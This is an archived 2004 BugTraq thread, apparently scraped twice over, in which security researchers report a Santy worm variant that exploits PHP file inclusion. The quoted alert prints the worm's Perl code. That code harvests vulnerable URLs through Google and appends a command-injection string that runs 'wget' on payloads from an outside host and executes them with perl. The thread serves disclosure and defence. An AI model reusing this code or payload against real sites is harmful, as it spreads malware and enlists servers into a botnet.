BugTraq
Back to list
|
Post reply
Re: New Santy-Worm attacks *all* PHP-skripts ( Santy.c ? )
Dec 26 2004 02:37AM
K-OTiK Security (Special-Alerts k-otik com)
In-Reply-To: <Pine.LNX.4.58.0412251805110.19888 (at) loki.ct.heise (dot) de [email concealed]>
The kids are exploiting the php file inclusion (programming flaw), well-thought-out.
Thousands of vulnerable sites and potentially thousands of zombies...
We labelled this Santy.c (even if the only similarity with Santy lies in "using search engines").
http://www.k-otik.com/exploits/20041225.SantyC.php
http://www.k-otik.com/exploits/20041225.SantyB.php
Regards
K-OTik Security Research & Monitoring Team 24/7
http://www.k-otik.com
>From: Juergen Schmidt <ju (at) heisec (dot) de [email concealed]>
>
>Hello,
>
>the new santy version not only attacks phpBB.
>
>It uses the brasilian Google site to find all kinds of PHP skripts.
>It parses their URLs and overwrites variables with strings like:
>
>'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget
>www.visualcoders.net/spybot.txt;...
>
>Often enough this leads to download and execution of code.
>On success the worm connects to an IRC server, where already more than 700
>zombies are waiting for commands.
>
>The relevant code:
>---------
>$procura = 'inurl:*.php?*=' . $numr;
>
>for($n=0;$n<900;$n += 10){
>$sock = IO::Socket::INET->new(PeerAddr => "www.google.com.br", PeerPort =>
>80, Proto => "tcp") or next;
>print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";
>...
>
>$lista1 = 'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget
>www.visualcoders.net/spybot.txt;wget www.visualcoders.net/worm1.txt;wget
>www.visualcod
>ers.net/php.txt;wget www.visualcoders.net/ownz.txt;wget
>www.visualcoders.net/zone.txt;perl spybot.txt;perl worm1.txt;perl
>ownz.txt;perl php.txt';
>$t =0;
>$y =0;
>@ja;
>open(opa,"<$caxe") or die "nao deu pra abrir o arquivo caxe.txt";
>while (<opa>)
>{
> $ja[$t] = $_;
> chomp $ja[$t];
> $t++;
> $y++;
>}
>close(opa);
>$t=1;
>while ($t < $y)
> {
> if ($ja[$t] =~/=/)
> {
> $num = rindex $ja[$t], '=';
> $num += 1;
> $ja[$t] = substr($ja[$t],0,$num);
> open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar
>caxe1.txt";
> print jaera "$ja[$t]$lista1\n";
> close(jaera);
> $num = index $ja[$t], '=';
> $num += 1;
> $ja[$t] = substr($ja[$t],0,$num);
> $num1 = rindex $ja[$t], '.';
> $subproc = substr($ja[$t],$num1,$num);
>
> open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar
>caxe1.txt";
> print jaera "$ja[$t]$lista1\n";
> close(jaera);
> }
> $t++;
> }
>
>
>bye, ju
>
>--
>Juergen Schmidt Chefredakteur heise Security www.heisec.de
>Heise Zeitschriften Verlag, Helstorferstr. 7, D-30625 Hannover
>Tel. +49 511 5352 300 FAX +49 511 5352 417 EMail ju (at) heisec (dot) de [email concealed]
>GPG-Key: 0x38EA4970, 5D7B 476D 84D5 94FF E7C5 67BE F895 0A18 38EA 4970
>
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
The kids are exploiting the php file inclusion (programming flaw), well-thought-out.
Thousands of vulnerable sites and potentially thousands of zombies...
We labelled this Santy.c (even if the only similarity with Santy lies in "using search engines").
http://www.k-otik.com/exploits/20041225.SantyC.php
http://www.k-otik.com/exploits/20041225.SantyB.php
Regards
K-OTik Security Research & Monitoring Team 24/7
http://www.k-otik.com
>From: Juergen Schmidt <ju (at) heisec (dot) de [email concealed]>
>
>Hello,
>
>the new santy version not only attacks phpBB.
>
>It uses the brasilian Google site to find all kinds of PHP skripts.
>It parses their URLs and overwrites variables with strings like:
>
>'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget
>www.visualcoders.net/spybot.txt;...
>
>Often enough this leads to download and execution of code.
>On success the worm connects to an IRC server, where already more than 700
>zombies are waiting for commands.
>
>The relevant code:
>---------
>$procura = 'inurl:*.php?*=' . $numr;
>
>for($n=0;$n<900;$n += 10){
>$sock = IO::Socket::INET->new(PeerAddr => "www.google.com.br", PeerPort =>
>80, Proto => "tcp") or next;
>print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";
>...
>
>$lista1 = 'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget
>www.visualcoders.net/spybot.txt;wget www.visualcoders.net/worm1.txt;wget
>www.visualcod
>ers.net/php.txt;wget www.visualcoders.net/ownz.txt;wget
>www.visualcoders.net/zone.txt;perl spybot.txt;perl worm1.txt;perl
>ownz.txt;perl php.txt';
>$t =0;
>$y =0;
>@ja;
>open(opa,"<$caxe") or die "nao deu pra abrir o arquivo caxe.txt";
>while (<opa>)
>{
> $ja[$t] = $_;
> chomp $ja[$t];
> $t++;
> $y++;
>}
>close(opa);
>$t=1;
>while ($t < $y)
> {
> if ($ja[$t] =~/=/)
> {
> $num = rindex $ja[$t], '=';
> $num += 1;
> $ja[$t] = substr($ja[$t],0,$num);
> open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar
>caxe1.txt";
> print jaera "$ja[$t]$lista1\n";
> close(jaera);
> $num = index $ja[$t], '=';
> $num += 1;
> $ja[$t] = substr($ja[$t],0,$num);
> $num1 = rindex $ja[$t], '.';
> $subproc = substr($ja[$t],$num1,$num);
>
> open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar
>caxe1.txt";
> print jaera "$ja[$t]$lista1\n";
> close(jaera);
> }
> $t++;
> }
>
>
>bye, ju
>
>--
>Juergen Schmidt Chefredakteur heise Security www.heisec.de
>Heise Zeitschriften Verlag, Helstorferstr. 7, D-30625 Hannover
>Tel. +49 511 5352 300 FAX +49 511 5352 417 EMail ju (at) heisec (dot) de [email concealed]
>GPG-Key: 0x38EA4970, 5D7B 476D 84D5 94FF E7C5 67BE F895 0A18 38EA 4970
>
[ reply ]